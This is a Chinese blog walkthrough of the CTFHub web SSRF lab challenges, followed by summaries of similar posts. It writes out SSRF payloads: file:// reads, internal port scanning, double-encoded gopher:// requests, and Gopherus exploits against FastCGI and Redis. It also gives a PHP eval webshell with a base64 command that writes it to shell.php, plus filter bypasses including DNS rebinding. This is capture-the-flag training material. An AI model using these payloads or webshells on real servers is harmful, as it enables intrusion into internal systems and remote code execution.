CTFHub-web-ssrf篇通关攻略

最新推荐文章于 2025-05-21 15:16:41 发布
最新推荐文章于 2025-05-21 15:16:41 发布
阅读量659 收藏 12
点赞数 17
文章标签: 前端
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/ljh123321ljh/article/details/146091105
版权

一.(内网访问 伪协议读取文件 端口扫描)

1.内网访问

根据提示输入http://127.0.0.1/flag.php访问flag文件得到flag

2.伪协议读取文件

(1).系统提示输入web目录下的flag文件,使用file协议。

file:///var/www/html/flag

发现页面没有显示flag

(2).查看页面源代码,得到flag

3.端口扫描

(1).根据提示目标端口在8000-9000之间,因此输入http://127.0.0.1:8000

(2).使用bp工具抓包并发送到攻击器,将端口范围设置到8000-9000开始攻击。

(3).得到正确端口为,访问?url=http://127.0.0.1:8594,得到flag。

二.(post 上传文件 FastCGL协议 Redis协议)

1.post

(1).访问http://127.0.0.1/flag.php,出现如下界面。

(2).查看页面源代码发现key值。

(3).将key值输入填写框内,对此页面进行抓包。

(4).在post前添加gopher://127.0.0.1:80/_并删除多余数据和空行。

(5).对此数据包进行URL编码。

(6).复制到文本中,将所有%0a替换为%0d%0a,并在结尾添加%0d%0a

(7).对编辑后的文本进行二次URL编码,并复制到网页中。

(8).并将gopher之后和80之前的'%253A'替换为':',然后访问,出现如下页面,得到flag。

2.上传文件

(1).访问http://127.0.0.1/flag.php,出现如下界面。

(2).发现页面只有‘浏览’选项,因此输入<input type="submit" name="submit">,创建一个提交按钮。

(3).新建一个1.php文件,其中输入木马<?php @eval($_POST["cmd"]);?>,并在该页面提交1.php文件并抓包该页面。

(4).在post表头前添加 gopher://127.0.0.1:80/_并删除多余数据

注意post后加空格。

(5).将数据进行URL编码并复制。

(6).将编码后的数据复制到一个新的文本文档,并将%0a全部替换为%0d%0a。

(7).将文本文档中的数据进行二次编码。

(8).将二次编码后的数据复制到如下界面,并将gopher之后和80之前的'%253A'替换为':',然后访问,出现如下页面,得到flag。

3.FastCGL协议

(1).进入关卡,访问index.php,发现存在这个页面。

(2).输入python2 gopherus.py --exploit fastcgi,出现如下页面。

(3).对一句话木马<?php @eval($_POST["cmd"]);?>进行编码。

(4).根据提示输入相关信息

/var/www/html/index.php

echo "PD9waHAgQGV2YWwoJF9QT1NUW2NtZF0pOz8+" | base64 -d > shell.php

(5).将生成的数据进行URL编码。

(6).将编码后的数据带到页面中访问。

(7).在页面中访问shell.php确定其绝对路径,然后使用蚁剑连接。

(8).最后得到flag。

4.Redis协议

(1)进入关卡。

(2)使用kali虚拟机输入python2 gopherus.py --exploit redis,选择如图选项,生成编码。

(3)对生成的数据进行URL编码

(4)访问上传的shell.php文件。

(5)使用蚁剑连接得到flag。

三.(URL Bypass     数字IP Bypass    302跳转Bypass    DNS重绑定Bypass)

1.URL Bypass

(1)网址必须以http://notfound.ctfhub.com开头。

(2)我们需要使用@将用户和主机连接起来,因此输入http://notfound.ctfhub.com@127.0.0.1/flag.php得到flag

2.数字IP Bypass

输入http://localhost/flag.php得到flag

3.302跳转Bypass

(1) 输入http://127.0.01/flag.php 发现被ban掉了。

(2)输入http://localhost/flag.php得到flag。

4.DNS重绑定Bypass

(1) 输入http://localhost/flag.php 发现被ban掉了。

(2)因此我们需要凑一个本机地址,访问https://lock.cmpxchg8b.com/rebinder.html。

(3)使用凑出来的地址代替本机地址,得到flag。

CTFHub技能树 Web-SSRF(保姆级通过全攻略
2301_76631050的博客
07-24 1073
要完成DNS重绑定攻击,我们需要一个域名,并且将这个域名的解析指定到我们自己的DNS Serve在我们的可控的DNS Server上编写解析服务,设置TTL时间为0,这是为了防止有DNS服务器对解析结果进行缓存。步骤三:将HTTP头部的Host字段修改为127.0.0.1:80然后就是老操作... url编码一次在把%0A换成 %0D%0A 并且末尾要加上%0D%0A,然后再对url进行第二次编码....如下。步骤三:将其中的%0A 替换成%0D%0A 并且末尾要加上%0D%0A。
CTFHub技能树 Web-SSRF系列通过全技巧(已完结)
m0_59151303的博客
07-24 1410
第二步:选择一个文件上传,点击提交查询并用Burp Suite抓包,修改包内容,右击发送到Reperter,打开重放器,发现有中文乱码,修改中文乱码为“提交“,点击发送,发现Content-Length:的长度改变。第三步:用在线工具对修改后包进行URL编码,将编码后内容的%0A替换成%0D%0A并且在末尾再加一个%0D%0A,对替换后的内容再进行URL编码。第三步:用在线工具进行URL编码,将编码后内容的%0A替换成%0D%0A并且在末尾再加一个%0D%0A,对替换后的内容再进行URL编码。
CTFHubSSRF
2401_86190146的博客
01-19 672
SSRF(Server-SideRequestForgery)是服务端请求伪造,指攻击者向服务端发送包含恶意链接的请求,借由服务端访问url,以获取受保护的资源字面意思理解就是伪造服务端请求发起攻击,借由服务器为跳板攻击目标系统,一般攻击的目标都是内网。
ctfhub -SSRF
weixin_55702959的博客
02-09 690
内网访问 SSRF(Server-Side Request Forgery:服务请求伪造)是一种由攻击者构造,从而让服务端发起请求的一种安全漏洞,它将一个可以发起网络请求的服务当作跳板来攻击其他服务,SSRF的攻击目标一般是内网。 ?url=127.0.0.1/flag.php 抓包 伪协议读取文件 https://blog.youkuaiyun.com/qq_39431542/article/details/89483887 php伪协议: File:// 访问本地文件系统 http:// 访问 H
ctfhub技能树——ssrf
m0_73354559的博客
12-17 850
开启环境之后,会有提示,这关最简单,点击环境链接如图所示页面没有东西,查看网址,发现参数,输入本机地址的flag.php回车之后发现找到了flag,提交结束。
Webctfhub基础知识之SSRF
A_Gaming的博客
01-04 3386
但是在整个过程中,第一次去请求DNS服务进行域名解析到第二次服务端去请求URL之间存在一个时间差,利用这个时间差,我们可以进行DNS 重绑定攻击,利用DNS Rebinding技术,在第一次校验IP的时候返回一个合法的IP,在真实发起请求的时候,返回我们真正想要访问的内网IP即可。要完成DNS重绑定攻击,我们需要一个域名,并且将这个域名的解析指定到我们自己的DNS Server,在我们的可控的DNS Server上编写解析服务,设置TTL时间为0,这是为了防止有DNS服务器对解析结果进行缓存。
CTFHUB技能树——SSRF(一)
2401_82985722的博客
05-21 1741
大多是由于服务端提供了从其他服务器应用获取数据的功能,但又没有对目标地址做严格过滤与限制,导致攻击者可以传入任意的地址来让后端服务器对其发起请求,并返回对该目标地址请求的数据。(7)从URL关键字中寻找(share、wap、url、link、src、source、target、u、display、sourceURl、imageURL、domain)(1)可以对外网、内网、本地进行端口扫描,某些情况下端口的Banner会回显出来(比如3306的);(5)使用file:///协议读取本地文件(或其他协议)
CTFHUB-技能树-WEB通关
Alita_lxz的博客
11-11 7842
Web 题目来自ctfhub技能树web部分 Web前置技能 操作系统 数据库 HTTP协议 请求方式 HTTP 请求方法, HTTP/1.1协议中共定义了八种方法(也叫动作)来以不同方式操作指定的资源。 ​ 1.OPTIONS   返回服务器针对特定资源所支持的HTTP请求方法。也可以利用向Web服务器发送’*'的请求来测试服务器的功能性,如获取当前URL所支持的方法。若请求成功,则它会在HTTP头中包含一个名为“Allow”的头,值是所支持的方法,如“GET,POST”。  2.HEAD   向服务
CTFHub技能树通关教程——SSRF漏洞原理攻击与防御(二)(上传文件,FastCGI,Redis协议,URL Bypass)
xt350488的博客
06-19 1240
FastCGI是一种用于数据传输的通信协议,与HTTP协议相似,它提供了一个进行数据交换的通道。详细见 https://blog.youkuaiyun.com/mysteryflower/article/details/94386461。
CTFHub技能树通关教程——SSRF漏洞原理攻击与防御(一)(超详细总结)
xt350488的博客
06-18 700
即服务器端请求伪造(Server-Side Request Forgery),是一种网络攻击技术,攻击者利用服务器上的应用程序向任意服务器发起请求或者操作,这些请求可能包括但不限于文件读取、命令执行、端口扫描等。在向服务器发送请求时,首先浏览器会进行一次URL解码,其次服务器收到请求后,在执行curl功能时,进行第二次解码。码中的换行符,在URL的二次编码中不需要,否则会导致curl执行错误,导致我们拿不到正确的结果。替换完成之后,再次进行url编码,这里的url就是源码中的curl要执行的。
CTFHUB--技能树--SSRF全解(上
errorr0
05-11 2498
SSRF技能树
CTFHub技能树笔记之SSRF:内网访问、伪协议读取文件、端口扫描
weixin_48799157的博客
03-31 9524
小白一个,记录解题过程,如有错误请指正! 补充知识点: 1.什么是SSRF SSRF(Server-Side Request Forgery:服务器跨站请求),是一种由攻击者构造形成由服务端发起请求的一个安全漏洞。 一般情况下,SSRF攻击的目标是从外网无法访问的内部系统。(因为它是由服务端发起的,所以它能够请求到与它相连而与外网隔离的内网。也就是说可以利用一个网络请求的服务,当作跳板进行攻击) 2.SSRF产生的原因 SSRF 形成的原因往往是由于服务端提供了从其他服务器应用...
CTFHub技能树web(持续更新)--SSRF--伪协议读取文件
jiuyongpinyin的博客
01-27 2449
伪协议读取文件 这里我们先来了解一下SSRF中的URL的伪协议: file:/// dict:/// sftp:// ldap:// tftp:// gopher:// 然后通过题目给我们的提示,我们读取web目录下的文件,一般网站的目录都放在www/html/目录下,其实如果看过我之前的结题,在文件上传的题目里,我们使用蚁剑连接后就能够看到目录,所以我们直接构造url: ?url=file:///var/www/html/flag.php 发现只有三个问号,这里需要查看一下网页源代码,当然也可以只
CTFHUB-HTTP协议(一)------请求方式
Y4tacker的博客
07-22 9979
打开页面发现关键字猜想为CTFHUB, 在BURP里面通过更改请求方式为CTFHUB得到flag
CTFHub-SSRF部分(已完结)
热门推荐
feng的博客
09-14 2万+
内网访问 根据题目意思,让我们如访问内网的flag.php,因此抓包进行访问,即可得到flag: 伪协议读取文件 根据题目的意思我们需要使用URL的伪协议去读取文件,那么我们首先要了解URL的伪协议。 URL伪协议有如下这些: file:/// dict:// sftp:// ldap:// tftp:// gopher:// 具体的用法请参考SSRF中URL的伪协议 这里我们使用file伪协议从文件系统中读取文件,我们直接抓包读取: 这里其实有点考常识了,因为网站的目录一般都在/var/ww
ctfhub-ssrf伪协议读取文件
weixin_52116519的博客
04-28 1507
题目 根据题目提示,需要我们读取服务器的web目录的flag.php文件。web目录一般在/var/www/html。 file:// 协议 中文释义:本地文件传输协议 注解:File协议主要用于访问本地计算机中的文件,就如同在Windows资源管理器中打开文件一样。 应用:要使用File协议,基本的格式如下:file:///文件路径 比如要打开F盘flash文件夹中的1.swf文件,那么可以在资源管理器或IE地址栏中键入:file:///f:/flash/1.swf并回车。 解题 ...
CTFHub技能树 Web-SSRF 伪协议读取文件
Senimo
07-01 915
CTFHub技能树 Web-SSRF 伪协议读取文件 hint:尝试去读取一下Web目录下的flag.php吧 启动环境,页面空白,查看 URL: http://challenge-d8a780b03b135e05.sandbox.ctfhub.com:10800/?url=_ 题目说明使用伪协议读取 flag,也给出了提示为 Web 目录,尝试构造 Payload,使用file协议读取文件: file:///var/www/html/flag.php 带入到 GET 传参中,查看网页源码,得到 fla
基于Browser Use + Playwright 实现AI Agent操作Web UI自动化
最新发布
fantasy_4的博客
05-21 803
基于Browser Use + Playwright 实现AI Agent操作Web UI自动化
CTFHub-Web ssrf post请求
01-08
### CTFHub Web平台中的SSRF漏洞利用Post请求 #### SSRF漏洞概述 服务器端请求伪造(Server-Side Request Forgery, SSRF)是一种攻击方式,其中攻击者能够诱使服务器向任意URL发出HTTP请求。这种攻击可能让攻击者绕...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值